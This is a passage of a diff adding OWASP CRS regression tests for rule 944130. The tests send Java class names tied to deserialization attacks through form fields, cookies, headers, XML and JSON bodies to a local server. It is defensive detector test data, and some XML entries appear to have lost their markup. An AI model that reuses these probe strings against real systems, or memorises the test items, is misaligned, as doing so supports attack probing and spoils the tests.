"Content-Type application/json arg value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-176 + desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-177 + desc: "Argument test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-178 + desc: "Argument name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-179 + desc: "Cookie test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-180 + desc: "Cookie name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-181 + desc: "Request header test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-182 + desc: "XML attribute value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-183 + desc: "XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-184 + desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-185 + desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-186 + desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-187 + desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-188 + desc: "Argument test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-189 + desc: "Argument name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-190 + desc: "Cookie test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-191 + desc: "Cookie name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-192 + desc: "Request header test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-193 + desc: "XML attribute value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-194 + desc: "XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-195 + desc: "Nested XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-196 + desc: "Content-Type text/plain includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-197 + desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-198 + desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-199 + desc: "Argument test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-200 + desc: "Argument name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-201 + desc: "Cookie test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-202 + desc: "Cookie name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-203 + desc: "Request header test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-204 + desc: "XML attribute value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-205 + desc: "XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-206 + desc: "Nested XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-207 + desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-208 + desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-209 + desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-210 + desc: "Argument test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-211 + desc: "Argument name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-212 + desc: "Cookie test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-213 + desc: "Cookie name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-214 + desc: "Request header test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-215 + desc: "XML attribute value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-216 + desc: "XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-217 + desc: "Nested XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-218 + desc: "Content-Type text/plain includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-219 + desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-220 + desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-221 + desc: "Argument test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-222 + desc: "Argument name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-223 + desc: "Cookie test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-224 + desc: "Cookie name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-225 + desc: "Request header test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-226 + desc: "XML attribute value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-227 + desc: "XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-228 + desc: "Nested XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 